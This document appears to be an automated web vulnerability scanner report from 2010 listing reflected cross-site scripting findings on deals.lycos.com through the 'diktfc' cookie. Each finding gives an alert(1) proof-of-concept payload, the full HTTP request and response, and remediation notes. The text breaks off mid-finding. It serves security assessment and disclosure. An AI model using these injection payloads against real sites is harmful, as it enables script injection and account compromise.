<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... tp://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/drawn-the-painted-tower-for-ipad-for-5-414364&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6006c"><script>alert(1)</script>104c0231a35&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2e8f"%3balert(1)//4a914e95c2b was submitted in the diktfc cookie. This input was echoed as c2e8f";alert(1)//4a914e95c2b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/element-40-1080p-lcd-hdtv-350-414616 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac2e8f"%3balert(1)//4a914e95c2b; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:10 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17406
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe5d1"><script>alert(1)</script>c619991de16 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/element-40-1080p-lcd-hdtv-350-414616 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afe5d1"><script>alert(1)</script>c619991de16; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:08 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17906
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... g src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/element-40-1080p-lcd-hdtv-350-414616&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afe5d1"><script>alert(1)</script>c619991de16&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faa24"><script>alert(1)</script>1fe7a425fe9 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/finepix-ax250-14mp-digicam-bundle-for-89-413481 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afaa24"><script>alert(1)</script>1fe7a425fe9; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19063
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... ://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/finepix-ax250-14mp-digicam-bundle-for-89-413481&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afaa24"><script>alert(1)</script>1fe7a425fe9&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce470"%3balert(1)//88a1fe2d76c was submitted in the diktfc cookie. This input was echoed as ce470";alert(1)//88a1fe2d76c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/finepix-ax250-14mp-digicam-bundle-for-89-413481 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ace470"%3balert(1)//88a1fe2d76c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:29 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18425
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e7d6"%3balert(1)//c92b2a5a915 was submitted in the diktfc cookie. This input was echoed as 9e7d6";alert(1)//c92b2a5a915 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9e7d6"%3balert(1)//c92b2a5a915; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:16 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19019
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c56d7"><script>alert(1)</script>c863840866d was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac56d7"><script>alert(1)</script>c863840866d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18986
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... .scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/flip-slidehd-720p-16gb-digital-camcorder-130-414368&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac56d7"><script>alert(1)</script>c863840866d&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48163"><script>alert(1)</script>6916582d15c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/free-iphone-applications-413656 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A48163"><script>alert(1)</script>6916582d15c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:03 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18895
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/free-iphone-applications-413656&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A48163"><script>alert(1)</script>6916582d15c&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f8d2"%3balert(1)//6cf56fb792b was submitted in the diktfc cookie. This input was echoed as 2f8d2";alert(1)//6cf56fb792b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/free-iphone-applications-413656 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f8d2"%3balert(1)//6cf56fb792b; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:05 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18795
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c62c4"><script>alert(1)</script>9c619f6f3d6 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/hp-home-coupons-up-to-400-off-414278 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac62c4"><script>alert(1)</script>9c619f6f3d6; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:07 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17636
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... g src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/hp-home-coupons-up-to-400-off-414278&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac62c4"><script>alert(1)</script>9c619f6f3d6&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5635"%3balert(1)//0d3ef562288 was submitted in the diktfc cookie. This input was echoed as a5635";alert(1)//0d3ef562288 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/hp-home-coupons-up-to-400-off-414278 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa5635"%3balert(1)//0d3ef562288; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:08 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17666
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d30a"%3balert(1)//dda5081c78 was submitted in the diktfc cookie. This input was echoed as 1d30a";alert(1)//dda5081c78 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/iphone-app-price-cuts-deals-from-1-414092 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1d30a"%3balert(1)//dda5081c78; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19342
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23774"><script>alert(1)</script>f4fd1e37b84 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/iphone-app-price-cuts-deals-from-1-414092 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A23774"><script>alert(1)</script>f4fd1e37b84; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:53 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19367
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... ="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/iphone-app-price-cuts-deals-from-1-414092&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A23774"><script>alert(1)</script>f4fd1e37b84&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad3ea"><script>alert(1)</script>6be4c9f934a was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/kempler-and-strauss-watch-cell-phone-175-413939 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aad3ea"><script>alert(1)</script>6be4c9f934a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:05 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17185
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... ://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/kempler-and-strauss-watch-cell-phone-175-413939&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aad3ea"><script>alert(1)</script>6be4c9f934a&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7814e"%3balert(1)//72d8244a306 was submitted in the diktfc cookie. This input was echoed as 7814e";alert(1)//72d8244a306 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
